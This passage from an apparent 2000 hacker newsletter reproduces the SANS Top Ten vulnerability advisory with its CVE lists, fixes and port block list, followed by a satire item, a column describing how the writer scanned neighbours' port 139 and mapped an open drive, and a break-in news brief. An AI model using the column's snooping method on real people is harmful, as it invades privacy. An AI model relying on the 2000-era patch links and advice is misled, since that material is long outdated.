         vulnerability in the software for ubiquitous Internet services such as DNS.  
      
      Systems Affected: 
      
      Multiple UNIX and Linux systems
      As of May 22, 2000, any version earlier than BIND v.8.2.2 patch level 5 is vulnerable.
      
      CVE Entries: 
      nxt CVE-1999-0833
      qinv CVE-1999-0009
      Other related entries: CVE-1999-0835, CVE-1999-0848, CVE-1999-0849, CVE-1999-0851
      
      Advice on correcting the problem:
      A. Disable the BIND name daemon (named) on all systems that are not authorized to be DNS servers.
         Some experts recommend you also remove the DNS software.
      
      B. On machines that are authorized DNS servers, update to the latest version and patch level 
         (as of May 22, 2000, latest version was 8.2.2 patch level 5) Use the guidance contained in the
         following advisories:
      
      For the NXT vulnerability: http://www.cert.org/advisories/CA-99-14-bind.html
      For the QINV (Inverse Query) and NAMED vulnerabilities: 
      http://www.cert.org/advisories/CA-98.05.bind_problems.html
      http://www.cert.org/summaries/CS-98.04.html
      
      C. Run BIND as a non-privileged user for protection in the event of future remote-compromise 
         attacks. (However, only processes running as root can be configured to use ports below 1024 
         a requirement for DNS. Therefore you must configure BIND to change the user-id after binding
         to the port.)
      
      D. Run BIND in a chroot()ed directory structure for protection in the event of future remote-
         compromise attacks.
       
      2. Vulnerable CGI programs and application extensions (e.g., ColdFusion) installed on web servers. 
         Most web servers support Common Gateway Interface (CGI) programs to provide interactivity in web 
         pages, such as data collection and verification. Many web servers come with sample CGI programs 
         installed by default. Unfortunately, many CGI programmers fail to consider ways in which their
         programs may be misused or subverted to execute malicious commands. Vulnerable CGI programs present
         a particularly attractive target to intruders because they are relatively easy to locate, and they 
         operate with the privileges and power of the web server software itself. Intruders are known to 
         have exploited vulnerable CGI programs to vandalize web pages, steal credit card information, and
         set up back doors to enable future intrusions, even if the CGI programs are secured. When Janet 
         Reno's picture was replaced by that of Adolph Hitler at the Department of Justice web site, an 
         in-depth assessment concluded that a CGI hole was the most probable avenue of compromise. Allaire's
         ColdFusion is a web server application package which includes vulnerable sample programs when 
         installed. As a general rule, sample programs should always be removed from production systems.  
      
      Systems Affected: 
      
      All web servers. 
      
      CVE Entries: 
      ** Sample CGI programs (All CGI)
      Remedy: 
      Remove all sample CGI programs on a production server.
      
      ** CAN-1999-0736(IIS 4.0, Microsoft Site Server 3.0, which is included with Microsoft Site Server
         3.0 Commerce Edition, Microsoft Commercial Internet System 2.0, and Microsoft BackOffice Server
         4.0 and 4.5)
      
      (see http://www.microsoft.com/technet/security/bulletin/ms99-013.asp )
      
      Remedy:
      
      Apply patch at : ftp://ftp.microsoft.com/bussys/iis/iis-public/fixes/usa/Viewcode-fix/   
      
      CVE-1999-0067 (phf phone book program included with older NCSA and Apache server)
      CVE-1999-0068 ('mylog.html' sample script shipped with the PHP/FI)
      CVE-1999-0270 (IRIX 6.2, IRIX 6.3, IRIX 6.4)
      CVE-1999-0346 (sample script shipped with the PHP/FI package)
      CVE-2000-0207 (IRIX 6.5)
      
      Most important CGI Vulnerabilities not including sample programs
      CAN-1999-0467 (WebCom Guestbook CGI)
      
      ** CAN-1999-0509 (All CGI Web Servers)
      Refer to http://www.cert.org/advisories/CA-96.11.interpreters_in_cgi_bin_dir.html 
      
      Remedy:
      The solution to this problem is to ensure that the CGI bin directory does not include any 
      general-purpose interpreters, for example 
      
      PERL 
      Tcl 
      UNIX shells (sh, csh, ksh, etc.) 
      CVE-1999-0021 (Muhammad A. Muquit's wwwcount version 2.3)
      CVE-1999-0039 (Outbox Environment Subsystem for IRIX)
      CVE-1999-0058 (PHP/FI package written by Rasmus Lerdorf)
      CVE-1999-0147 (Glimpse HTTP 2.0 and WebGlimpse)
      CVE-1999-0148 (Outbox Environment Subsystem for IRIX)
      CVE-1999-0149 (Outbox Environment Subsystem for IRIX)
      
      ** CVE-1999-0174 (All CGI Web Servers) Refer to, 
      http://xforce.iss.net/static/291.php 
      (More info at http://www.netspace.org/cgi-bin/wa?A2=ind9702B&L=bugtraq&P=R64 )
      Remedy:
      Remove the "view-source" script from the cgi-bin directory on your web server.
      
      CVE-1999-0177 (O'Reilly Website 2.0 and earlier CGI)
      CVE-1999-0178 (O'Reilly Website 2.0 and earlier CGI)
      CVE-1999-0237 (Webcom's CGI Guestbook for Win32 web servers)
      CVE-1999-0262 (fax survey CGI script on Linux )
      CVE-1999-0279 (Excite for Web Servers)
      CVE-1999-0771 (Compaq Management Agents and the Compaq Survey Utility)
      CVE-1999-0951 (OmniHTTPd CGI program)
      CVE-2000-0012 (MS SQL CGI program)
      CVE-2000-0039 (AltaVista search engine)
      CVE-2000-0208 (htsearch CGI script for ht://dig)
      
      ColdFusion Sample Program Vulnerabilities
      ** CAN-1999-0455
      ** CAN-1999-0922
      ** CAN-1999-0923
      
      ColdFusion Other Vulnerability
      ** CAN-1999-0760
      ** CVE-2000-0057
      
      Advice on correcting the problem:
      A. Do not run web servers as root 
      
      B. Get rid of CGI script interpreters in bin directories: 
      
      http://www.cert.org/advisories/CA-96.11.interpreters_in_cgi_bin_dir.html
      
      C. Remove unsafe CGI scripts 
      
      http://www.cert.org/advisories/CA-97.07.nph-test-cgi_script.html
      http://www.cert.org/advisories/CA-96.06.cgi_example_code.html
      http://www.cert.org/advisories/CA-97.12.webdist.html
      
      D. Write safer CGI programs:
      
      http://www-4.ibm.com/software/developer/library/secure-cgi/
      http://www.cert.org/tech_tips/cgi_metacharacters.html
      http://www.cert.org/advisories/CA-97.24.Count_cgi.html
      
      E. Don't configure CGI support on Web servers that don't need it.
      
      F. Run your Web server in a chroot()ed environment to protect the machine against yet
         to be discovered exploits 
       
      3. Remote Procedure Call (RPC) weaknesses in rpc.ttdbserverd (ToolTalk), rpc.cmsd 
         (Calendar Manager), and rpc.statd that allow immediate root compromise 
         
      Remote procedure calls (RPC) allow programs on one computer to execute programs on
      a second computer. They are widely-used to access network services such as shared 
      files in NFS. Multiple vulnerabilities caused by flaws in RPC, are being actively 
      exploited. There is compelling evidence that the vast majority of the distributed 
      denial of service attacks launched during 1999 and early 2000 were executed by 
      systems that had been victimized because they had the RPC vulnerabilities. The 
      broadly successful attack on U.S. military systems during the Solar Sunrise incident
      also exploited an RPC flaw found on hundreds of Department of Defense systems. 
      
      Systems Affected: 
      
      Multiple UNIX and Linux systems
      
      CVE Entries: 
      rpc.ttdbserverd - CVE-1999-0687, CVE-1999-0003, CVE-1999-0693 
      (-0687 is newer than -0003, but both allow root from remote attackers and it's
      likely that -0003 is still around a LOT; -0693 is only locally exploitable, but
      does give root)
      
      rpc.cmsd  CVE-1999-0696
      rpc.statd - CVE-1999-0018, CVE-1999-0019.
      
      Advice on correcting the problem:
      
      A. Wherever possible, turn off and/or remove these services on machines directly 
         accessible from the Internet.
      
      B. Where you must run them, install the latest patches:
      
      For Solaris Software Patches: 
      http://sunsolve.sun.com
      
      For IBM AIX Software 
      http://techsupport.services.ibm.com/support/rs6000.support/downloads
      http://techsupport.services.ibm.com/rs6k/fixes.html
      
      For SGI Software Patches:
      http://support.sgi.com/ 
      
      For Compaq (Digital Unix) Patches:
      http://www.compaq.com/support
      
      Search the vendor patch database for tooltalk patches and install them right away.
      
      A summary document pointing to specific guidance about each of three principal RPC
      vulnerabilities may be found at: http://www.cert.org/incident_notes/IN-99-04.html
      
      For statdd: http://www.cert.org/advisories/CA-99-05-statd-automountd.html 
      For ToolTalk: http://www.cert.org/advisories/CA-98.11.tooltalk.html
      For Calendar Manager: http://www.cert.org/advisories/CA-99-08-cmsd.html 
       
      4. RDS security hole in the Microsoft Internet Information Server (IIS) 
      Microsofts Internet Information Server (IIS) is the web server software found on
      most web sites deployed on Microsoft Windows NT and Windows 2000 servers. Programming
      flaws in IISs Remote Data Services (RDS) are being employed by malicious users to
      run remote commands with administrator privileges. Some participants who developed
      the "Top Ten" list believe that exploits of other IIS flaws, such as .HTR files, are
      at least as common as exploits of RDS. Prudence dictates that organizations using IIS
      install patches or upgrades to correct all known IIS security flaws when they install
      patches or upgrades to fix the RDS flaw.  
      
      Systems Affected: 
      
      Microsoft Windows NT systems using Internet Information Server
      CVE Entries: 
      CVE-1999-1011
      
      Advice on correcting the problem:
      An outstanding guide to the RDS weakness and how to correct it may be found 
      at: http://www.wiretrip.net/rfp/p/doc.asp?id=29&iface=2 
      
      B. Microsoft has also posted relevant information at:
      
      http://support.microsoft.com/support/kb/articles/q184/3/75.asp
      http://www.microsoft.com/technet/security/bulletin/ms98-004.asp
      http://www.microsoft.com/technet/security/bulletin/ms99-025.asp
       
      5. Sendmail buffer overflow weaknesses, pipe attacks and MIMEbo, that allow immediate
         root compromise. 
         
      Sendmail is the program that sends, receives, and forwards most electronic mail processed
      on UNIX and Linux computers. Sendmails widespread use on the Internet makes it a prime 
      target of attackers. Several flaws have been found over the years. The very first advisory
      issued by CERT/CC in 1988 made reference to an exploitable weakness in sendmail. In one of
      the most common exploits, the attacker sends a crafted mail message to the machine running
      Sendmail, and Sendmail reads the message as instructions requiring the victim machine to 
      send its password file to the attackers machine (or to another victim) where the passwords
      can be cracked. 
      
      Systems Affected: 
      
      Multiple UNIX and Linux systems
      
      CVE Entries: 
      CVE-1999-0047, CVE-1999-0130, CVE-1999-0131, CVE-1999-0203, CVE-1999-0204, CVE-1999-0206. 
      CVE-1999-0130 is locally exploitable only.
      
      Advice on correcting the problem:
      A. Upgrade to latest version of Sendmail and/or implement patches for sendmail. See
      http://www.cert.org/advisories/CA-97.05.sendmail.html 
      
      B. Do not run Sendmail in daemon mode (turn off the -bd switch) on machines that are neither
         mail servers nor mail relays.
       
      6. sadmind and mountd 
      
      Sadmind allows remote administration access to Solaris systems, providing graphical access to
      system administration functions. Mountd controls and arbitrates access to NFS mounts on UNIX 
      hosts. Buffer overflows in these applications can be exploited allowing attackers to gain 
      control with root access. 
      
      Systems Affected: 
      
      Multiple UNIX and Linux systems
      
      Sadmind: Solaris machines only
      
      CVE Entries: 
      
      sadmind - CVE-1999-0977
      mountd - CVE-1999-0002.
      
      Advice on correcting the problem:
      A. Wherever possible, turn off and/or remove these services on machines directly accessible 
         from the Internet.
      
      B. Install the latest patches:
      
      For Solaris Software Patches:
      http://sunsolve.sun.com
      
      For IBM AIX Software
      http://techsupport.services.ibm.com/support/rs6000.support/downloads
      http://techsupport.services.ibm.com/rs6k/fixes.html
      
      For SGI Software Patches:
      http://support.sgi.com/ 
      
      For Compaq (Digital Unix) Patches:
      http://www.compaq.com/support
      
      C. More guidance at:
      
      http://www.cert.org/advisories/CA-99-16-sadmind.html
      http://www.cert.org/advisories/CA-98.12.mountd.html 
       
      7. Global file sharing and inappropriate information sharing via NetBIOS and 
      Windows NT ports 135->139 (445 in Windows2000), or UNIX NFS exports on port 
      2049, or Macintosh Web sharing or AppleShare/IP on ports 80, 427, and 548.  
      These services allow file sharing over networks. When improperly configured, they can 
      expose critical system files or give full file system access to any hostile party 
      connected to the network. Many computer owners and administrators use these services 
      to make their file systems readable and writeable in an effort to improve the convenience
      of data access. Administrators of a government computer site used for software development
      for mission planning made their files world readable so people at a different government 
      facility could get easy access. Within two days, other people had discovered the open 
      file shares and stolen the mission planning software.
      
      When file sharing is enabled on Windows machines they become vulnerable to both information
      theft and certain types of quick-moving viruses. A recently released virus called the 911 
      Worm uses file shares on Windows 95 and 98 systems to propagate and causes the victims 
      computer to dial 911 on its modem. Macintosh computers are also vulnerable to file sharing
      exploits.
      
      The same NetBIOS mechanisms that permit Windows File Sharing may also be used to enumerate
      sensitive system information from NT systems. User and Group information (usernames, last 
      logon dates, password policy, RAS information), system information, and certain Registry 
      keys may be accessed via a "null session" connection to the NetBIOS Session Service. This
      information is typically used to mount a password guessing or brute force password attack
      against the NT target.
       
      Systems Affected: 
      
      UNIX, Windows, and Macintosh systems.
      CVE Entries: 
      SMB shares with poor access control - CAN-1999-0520
      NFS exports to the world - CAN-1999-0554
      These candidate entries are likely to change significantly before being accepted as full 
      CVE entries.
      
      Advice on correcting the problem:
      A. When sharing mounted drives, ensure only required directories are shared.
      
      B. For added security, allow sharing only to specific IP addresses because DNS names can 
         be spoofed. 
      
      C. For Windows systems, ensure all shares are protected with strong passwords.
      
      D. For Windows NT systems, prevent anonymous enumeration of users, groups, system 
         configuration and registry keys via the "null session" connection. 
      
      Block inbound connections to the NetBIOS Session Service (tcp 139) at the router or 
      the NT host.
      
      Consider implementing the RestrictAnonymous registry key for Internet-connected hosts in
      standalone or non-trusted domain environments:
      
      NT4: http://support.microsoft.com/support/kb/articles/Q143/4/74.asp
      Win2000: http://support.microsoft.com/support/kb/articles/Q246/2/61.ASP
      
      E. A quick, free, and secure test for the presence of NetBIOS file sharing, and its related
      vulnerabilities, effective for machines running ANY operating system, is available at the 
      Gibson Research Corporation web site. Simply visit http://grc.com/ and click the "ShieldsUP"
      icon to receive a real-time appraisal of any system's NetBIOS exposure. Detailed instructions
      are available to help Microsoft Windows users deal with NetBIOS vulnerabilities.
      
      F. For Macintosh systems, disable file sharing and web sharing extensions unless absolutely 
      required. If file sharing must be enabled, ensure strong passwords for access, and stop file
      sharing during periods in which it is not required.
      
      To permanently disable Web sharing in MacOS 8 or MacOS 9, remove two files and restart:
      System Folder:Control Panels:Web Sharing
      System Folder:Extensions:Web Sharing Extension
      
      To permanently disable AppleShare/IP in MacOS 9, remove one file and restart:
      System Folder:Extensions:Shareway IP Personal Bgnd
       
      8. User IDs, especially root/administrator with no passwords or weak passwords. 
      Some systems come with "demo" or "guest" accounts with no passwords or with widely-known
      default passwords. Service workers often leave maintenance accounts with no passwords, 
      and some database management systems install administration accounts with default passwords.
      In addition, busy system administrators often select system passwords that are easily 
      guessable ("love," "money," "wizard" are common) or just use a blank password. Default 
      passwords provide effortless access for attackers. Many attackers try default passwords
      and then try to guess passwords before resorting to more sophisticated methods. Compromised
      user accounts get the attackers inside the firewall and inside the target machine. Once inside,
      most attackers can use widely-accessible exploits to gain root or administrator access. 
      
      Systems Affected: 
      
      All systems.
      
      CVE Entries: 
      Unix guessable (weak) password - CAN-1999-0501
      Unix default or blank password - CAN-1999-0502
      NT guessable (weak) password - CAN-1999-0503
      NT default or blank password - CAN-1999-0504
      
      These candidate entries are likely to change significantly before being accepted as full 
      CVE entries.
      
      Advice on correcting the problem:
      A. Create an acceptable password policy including assigned responsibility and frequency for
         verifying password quality. Ensure senior executives are not exempted. Also include in 
         the policy a requirement to change all default passwords before attaching computers to 
         the Internet, with substantial penalties for non-compliance.
      
      B1. VERY IMPORTANT! Obtain written authority to test passwords
      
      B2. Test passwords with password cracking programs:
      
      For Windows NT: l0pthcrack http://www.l0pht.com
      For UNIX: Crack http://www.users.dircon.co.uk/~crypto
      
      C. Implement utilities that check passwords when created.
      
      For UNIX: Npasswd, http://www.utexas.edu/cc/unix/software/npasswd
      For Windows NT: http://support.microsoft.com/support/kb/articles/Q161/9/90.asp
      
      D. Force passwords to expire periodically (at a frequency established in your security policy).
      
      E. Maintain password histories so users cannot recycle old passwords.
      
      Additional information may be found at:
      
      http://www.cert.org/tech_tips/passwd_file_protection.html
      http://www.cert.org/incident_notes/IN-98.03.html
      http://www.cert.org/incident_notes/IN-98.01.irix.html 
       
      9. IMAP and POP buffer overflow vulnerabilities or incorrect configuration. 
      IMAP and POP are popular remote access mail protocols, allowing users to access their
      e-mail accounts from internal and external networks. The "open access" nature of these
      services makes them especially vulnerable to exploitation because openings are frequently 
      left in firewalls to allow for external e-mail access. Attackers who exploit flaws in IMAP
      or POP often gain instant root-level control. 
      
      Systems Affected: 
      
      Multiple UNIX and Linux systems
      
      CVE Entries: 
      CVE-1999-0005, CVE-1999-0006, CVE-1999-0042, CVE-1999-0920, CVE-2000-0091
      
      Advice on correcting the problem:
      A. Disable these services on machines that are not e-mail servers.
      
      B. Use the latest patches and versions. Additional information may be found at:
      
      http://www.cert.org/advisories/CA-98.09.imapd.html
      http://www.cert.org/advisories/CA-98.08.qpopper_vul.html
      http://www.cert.org/advisories/CA-97.09.imap_pop.html
      
      C. Some of the experts also recommend controlling access to these services using TCP wrappers
         and encrypted channels such as SSH and SSL to protect passwords.
       
      10. Default SNMP community strings set to public and private. 
          The Simple Network Management Protocol (SNMP) is widely used by network administrators to monitor
          and administer all types of network-connected devices ranging from routers to printers to computers.
          SNMP uses an unencrypted "community string" as its only authentication mechanism. Lack of encryption
          is bad enough, but the default community string used by the vast majority of SNMP devices is "public",
          with a few "clever" network equipment vendors changing the string to "private". Attackers can use this
          vulnerability in SNMP to reconfigure or shut down devices remotely. Sniffed SNMP traffic can reveal a 
          great deal about the structure of your network, as well as the systems and devices attached to it. 
          Intruders use such information to pick targets and plan attacks. 
          
      Systems Affected: 
      
      All system and network devices.
      
      CVE Entries: 
      default or blank SNMP community name (public) - CAN-1999-0517
      guessable SNMP community name - CAN-1999-0516
      hidden SNMP community strings - CAN-1999-0254, CAN-1999-0186
      
      These candidate entries are likely to change significantly before being accepted as full CVE entries.
      
      Advice on correcting the problem:
      A. If you do not absolutely require SNMP, disable it.
      
      B. If you are using SNMP, use the same policy for community names as used for passwords described 
         in Vulnerability Cluster Number 8 above.
      
      C. Validate and check community names using snmpwalk.
      
      D. Where possible make MIBs read only. Additional information:
      
      http://www.cisco.com/univercd/cc/td/doc/cisintwk/ito_doc/snmp.htm#xtocid210315 
       
      A High Priority Bonus Item for Windows Users and Administrators: 
      Various Scripting Holes in Internet Explorer and Office2000 
      
      Recent virus attacks have illustrated how macro and script code could spread easily through
      e-mail attachments, and people were admonished to avoid opening potentially dangerous 
      attachments. However, Windows users can also spread malicious viruses without opening attachments.
      Microsoft Outlook and Outlook Express will execute HTML and script code in an e-mail in their 
      default installations. In addition, several so-called ActiveX components are incorrectly executable
      from an e-mail containing HTML and script code. Some of the vulnerable controls include the Scriplet.
      typlib (ships with IE 4.x and 5.x) and the UA control (Office 2000). Other vulnerabilities arising 
      from the use of Active Scripting are that an e-mail could be used to install new software on a 
      users computer.
      
      A relatively benign virus known as the kak worm is already spreading through these mechanisms. 
      A malicious version of kak can be anticipated at any time. We recommend that all users and 
      administrators set Outlook and Outlook Express to read e-mail in the "Restricted Sites Zone" 
      and then further disable all Active Scripting and ActiveX related settings in that zone. This
      is done in the Options dialog's Security tab, but can be automated using System Policies. 
      Microsoft has made patches available for the individual problems and is readying a patch which
      will set the security settings in Outlook, but apparently has no plans on fixing Outlook Express.
       
      Systems Affected:
      
      All Windows systems with Internet Explorer 4.x and 5.x (even if it is not used) or Office 2000.
      Windows 2000 is not affected by some of the IE issues.
      
      CVE Entries:
      
      CVE-1999-0668
      CAN-2000-0329
      
      Advice on correcting the problem:
      http://www.microsoft.com/security/bulletins/ms99-032.asp
      http://www.microsoft.com/security/bulletins/MS99-048.asp
      http://www.microsoft.com/technet/security/bulletin/MS00-034.asp
      
      The fixes for the particular vulnerabilities discussed here are available from:
      
      http://www.microsoft.com/msdownload/iebuild/scriptlet/en/scriptlet.htm
      http://www.microsoft.com/msdownload/iebuild/ascontrol/en/ascontrol.htm
      http://officeupdate.microsoft.com/info/ocx.htm
      
      Set your Security Zone to restricted sites and then disable all active content in that zone. 
      
      Apply the patch to Outlook as soon as it becomes available at:
      
      http://www.officeupdate.com/2000/articles/out2ksecarticle.htm
      
      Updating your virus detection software, while important, is not a complete solution for this
      problem. You must also correct the flaws in Microsoft's software.
       
      Perimeter Protection For An Added Layer of Defense In Depth 
      
      In this section, we list ports that are commonly probed and attacked. Blocking these ports is
      a minimum requirement for perimeter security, not a comprehensive firewall specification list.
      A far better rule is to block all unused ports. And even if you believe these ports are blocked,
      you should still actively monitor them to detect intrusion attempts. A warning is also in order.
      Blocking some of the ports in the following list may disable needed services. Please consider 
      the potential effects of these recommendations before implementing them.
      
      Block "spoofed" addresses-- packets coming from outside your company sourced from internal
      addresses or private (RFC1918 and network 127) addresses. Also block source routed packets. 
      Login services-- telnet (23/tcp), SSH (22/tcp), FTP (21/tcp), NetBIOS (139/tcp), rlogin et 
      al (512/tcp through 514/tcp) 
      
      RPC and NFS-- Portmap/rpcbind (111/tcp and 111/udp), NFS (2049/tcp and 2049/udp), lockd 
      (4045/tcp and 4045/udp) 
      
      NetBIOS in Windows NT -- 135 (tcp and udp), 137 (udp), 138 (udp), 139 (tcp). Windows 2000 
      earlier ports plus 445(tcp and udp) 
      
      X Windows -- 6000/tcp through 6255/tcp 
      
      Naming services-- DNS (53/udp) to all machines which are not DNS servers, DNS zone transfers 
      (53/tcp) except from external secondaries, LDAP (389/tcp and 389/udp) 
      
      Mail-- SMTP (25/tcp) to all machines, which are not external mail relays, 
      POP (109/tcp and 110/tcp), IMAP (143/tcp) 
      
      Web-- HTTP (80/tcp) and SSL (443/tcp) except to external Web servers, may also want to block
      common high-order HTTP port choices (8000/tcp, 8080/tcp, 8888/tcp, etc.) 
      
      "Small Services"-- ports below 20/tcp and 20/udp, time (37/tcp and 37/udp) 
      
      Miscellaneous-- TFTP (69/udp), finger (79/tcp), NNTP (119/tcp), NTP (123/tcp), LPD (515/tcp),
      syslog (514/udp), SNMP (161/tcp and 161/udp, 162/tcp and 162/udp), BGP (179/tcp), SOCKS (1080/tcp) 
      
      ICMP-- block incoming echo request (ping and Windows traceroute), block outgoing echo replies, 
      time exceeded, and destination unreachable messages except "packet too big" messages (type 3, 
      code 4). (This item assumes that you are willing to forego the legitimate uses of ICMP echo 
      request in order to block some known malicious uses.) 
      
       
      Signatories: 
      
      Randy Marchany, Virginia Tech
      Scott Conti, University of Massachusetts
      Matt Bishop, University of California, Davis
      Sten Drescher, Tivoli Systems
      Lance Spitzner, Sun Microsystems GESS Security Team
      Alan Paller, SANS Institute
      Stephen Northcutt, SANS Institute
      Eric Cole, SANS Institute
      Gene Spafford, Purdue University CERIAS
      Jim Ransome, Pilot Network Services
      Frank Swift, Pilot Network Services
      Jim Magdych, Network Associates, Inc.
      Jimmy Kuo, Network Associates, Inc.
      Igor Gashinsky, NetSec, Inc.
      Greg Shipley, Neohapsis
      Tony Sager, National Security Agency 
      Larry Merritt, National Security Agency
      Bill Hill, MITRE
      Steve Christey, MITRE
      Viriya Upatising, Loxley Information Services Co.
      Marcus Sachs, JTF-CND, US Department of Defense
      Billy Austin, Intrusion.com
      Christopher W. Klaus, Internet Security Systems
      Wayne Stenson, Honeywell
      Martin Roesch, Hiverworld, Inc.
      Jeff Stutzman, Healthcare ISAC
      Ed Skoudis, Global Integrity
      Gene Schultz, Global Integrity
      Kelly Cooper, Genuity
      Eric Schultze, Foundstone
      Bill Hancock, Exodus Communications
      Ron Nguyen, Ernst & Young
      Lee Brotzman, NASIRC, Allied Technology Group, Inc.
      Scott Lawler, DoD Cert
      Hal Pomeranz, Deer Run Associates
      Chris Brenton, Dartmouth Institute for Security Studies
      Bruce Schneier, Counterpane Internet Security, Inc.
      Nick FitzGerald, Computer Virus Consulting Ltd.
      Shawn Hernan, CERT Coordination Center
      Kathy Fithen, CERT Coordination Center
      Derek Simmel, Carnegie Mellon University
      Jesper Johansson, Boston University
      Dave Mann, BindView
      Rob Clyde, Axent
      David Nolan, Arch Paging
      Mudge, @stake  
      The following is a list of people who have helped make this document better through 
      their contributions: 
      
      Robert Harris 
       
      
       2000 SANS Institute  :  Office 301.951.0102  :  Registration 719.599.4303  :  
      Web Contact scott@sans.org
       
      @HWA  
      
      
      
      
258.0 [0x4] Justin Tanner aka Agent Steal in amazing plot escapes again.
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~      
       
       AP: New w0rld Media       
       
       Exclusive to the Norton Rambler
       Tony Crosslink reports.
       
       Justin Tanner had been spending time in prison wisely, by incorporating
       secret yoga techniques and remaining on a diet of only his own urine 
       insects and St Johns Wort with ginseng snaps was able to lose weight
       and gain the dexterity necessary to hide his body in the cavity of his 
       wooden leg..
       
       "It appeared to be just laying there by itself, I assumed Mr Tanner
       was in the excercise yard" said a bewildered prison guard. The guard
       50 yr old Cliff Draper had picked up the apparently mislaid prosthetic
       and moved it unaware of the concealed Tanner to an unsecured location.
      
       After waiting 4 hrs cramped inside the leg hollow of the limb he 
       squeezed out just before clamp down and made good his escape in a 
       laundry hamper.
       
       AP
       
       <satire>
       
       @HWA
          
       
259.0 [IND] Peeping Through Port 139
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
           
      June 2 2000
      www.infowar.com
      http://www.infowar.com/hacker/00/hack_060500a_j.shtml
           
      
      6/2/00
      Peeping Through Port 139
      
      I couldn't believe it. There, before me on my computer screen, was a 
      directory filled with family photos, labeled by name. I could have looked 
      at pictures of these folks if I'd cared to. It wasn't my family, though, 
      and these photos weren't on my computer. I had no idea whose computer they 
      were on, but I guessed it was someone in my apartment building, and that 
      they hadn't a clue I was spying on them.

      Many of us here in my building get Internet access through cable modems. 
      Few know of the security risks. Now that high-speed access to the Internet 
      can be had through cable and digital subscriber lines (DSL), security 
      holes are easier to exploit. They're easy to fix too, but few are, 
      probably because few people know about the breaches in the first place. 
      Certainly, the cable guy who hooked me up never told me that Windows, in 
      effect, offers an Internet party line to my hard drive. I'm guessing that 
      at least three of my neighbors weren't informed either.

      How easy is it to tap into a neighbor's computer if it isn't secured 
      properly? Insanely easy, I learned after a recent night of experimenting. 
      It doesn't take any networking savvy -- just the right program and some 
      anti-social attitude.

      One such program is called SMBScanner. It took me about 10 minutes to find 
      on the Internet. Like a police scanner monitoring many frequencies, this 
      software rolls through Internet-protocol (IP) numbers (Internet addresses 
      of nine digits separated by periods, the online equivalent to phone 
      numbers), checking for open ports on computers. Now, a cable company like 
      the one I use usually reserves blocks of successive IP numbers for 
      customer use. So I figured my neighbors would have numbers nearly 
      identical to mine, probably varying only in the last two digits. 
      SMBScanner paid a visit to each of these addresses, checking to see if 
      port 139 -- the connection point computers often use to network with one 
      another -- was open. Within minutes, it found three.

      From there, it was just a matter of employing the operating system's 
      user-friendly ability to "map" another computer's hard drive to its own 
      file system. This was a snap, given that two of the three computers had no 
      password protection whatsoever. One poor user actually had a printer 
      online. I pondered printing him or her a page reading YOU'VE BEEN HACKED! 
      But what good would such a missive be if I couldn't enjoy the other 
      person's surprise upon receiving it? Anyway, it was probably best to 
      remain in stealth mode for this fact-finding mission. So I mapped someone 
      else's C drive instead, giving me access to its contents. And that's when 
      I found the directory named "Family Photos."

      That's also when I chickened out. I couldn't nerve myself up to actually 
      look at any of the snapshots. I felt guilty enough already for having 
      snooped this far. So I disconnected. My point was made. I didn't actually 
      want to peer into somebody else's computer; I just wanted to see if I 
      could do it.

      Anyone who has a high-speed Internet connection (and wants to avoid having 
      done to them what I nearly did to my neighbors) should take the ShieldsUp 
      security test offered by the Gibson Research Corp. (GRC, grc.com), run by 
      computer guru Steve Gibson. It's where I learned about these 
      vulnerabilities. GRC's Web site tests your computer to see what ports it 
      can wiggle into. It's an eyeopener.

      How does this happen? It's a weird amalgamation of factors, a snafu that 
      only surfaces when home networking, dedicated Internet lines, and people's 
      steadfast refusal to use passwords are combined.

      Start with someone tying two computers together. According to GRC, when 
      "Microsoft's networking client is installed, a default setting which would 
      have protected many millions of computers if it were normally set to 'off' 
      is instead set to 'on.'" Upshot? A home network is left open to the entire 
      Internet. What is odd about this is that it is totally unnecessary. This 
      option was set to "on" only to save Microsoft in customer-service calls, 
      the Gibson site contends.

      Until recently, the pitfalls of home networking were limited, as most 
      networked Netters went online with dial-up connections, which were 
      assigned IPs more randomly. They remained online for limited periods of 
      time and so were harder to pinpoint. But as more people set up networks 
      and use connections that are always "on," it is starting to make for a lot 
      of sitting ducks.

      And there are a lot of clandestine hunters out there. Here are computers 
      that remain online for long stretches of time, with easily discoverable IP 
      numbers. What better place than on somebody else's computer to spend some 
      time nosing around, looking for free software or just some neighborly 
      dish?

      I asked a system administrator who used to work for one of Baltimore's 
      Internet service providers how much port-scanning he used to see. "The 
      amount was staggering," he responded by e-mail -- about once a minute, 
      some unknown computer cracker would test the lines, looking for an in. The 
      friend's employer blocked that sort of traffic from reaching its 
      customers, at least that from folks with other ISPs. It didn't stop this 
      company's customers from snooping on each other, though, as I'd snooped on 
      my neighbors.

      GRC provides an easy explanation of how to secure port 139. All it 
      involves is a few points and clicks. The biggest challenge is letting 
      people know.
      
      
      C Y B E R P U N K
      By Joab Jackson
      http://www.citypaper.com/2000-05-03/cyber.html 
      
      Just like reverse TV: joabj@charm.net. 
      
      
      @HWA
      
260.0 [IND] Hacker Hits Road Runner Server;
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
           
      June 2 2000
      www.infowar.com
      http://www.infowar.com/hacker/00/hack_060500b_j.shtml     
      
      6/2/00
      Hacker Hits Road Runner Server;
      Subscribers Need New Passwords
      
      
      Houston subscribers to Time Warner Communications' Road Runner cable-modem 
      Internet service were told Thursday night to change their passwords after 
      a hacker broke into an e-mail server.

      But a glitch in a computer prevented customers from making the change 
      Thursday evening.

      Spokeswoman Kimberly Maki said the hacker may have gotten access to a 
      database of e-mail logons and passwords on Wednesday.

      Road Runner technicians noted suspicious activity on the network and 
      disabled the hacker's cable modem about 30 minutes after the intrusion 
      started, she said. The hacker tried to come back in via the Internet later 
      and was stopped again.

      Maki said technicians would complete a planned upgrade of the Road Runner 
      system Thursday night and use the opportunity to increase security.

      Customers were e-mailed instructions for changing their passwords on 
      Thursday.

      A technical support staffer said Thursday the computer used to update 
      customer information was down and likely would be back up sometime today.

      Maki said Road Runner managers believe they identified the hacker and 
      notified law enforcement officials. 
      
      By DWIGHT SILVERMAN 
      Copyright 2000 Houston Chronicle
      June 1, 2000, 7:57PM 
      
      http://www.chron.com/cs/CDA/story.hts/business/568293 
      
      @HWA
      
261.0 [IND] Swedish Hacker-Tracker Is FBI And Media Darling
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
           
      June 12 2000
      www.infowar.com
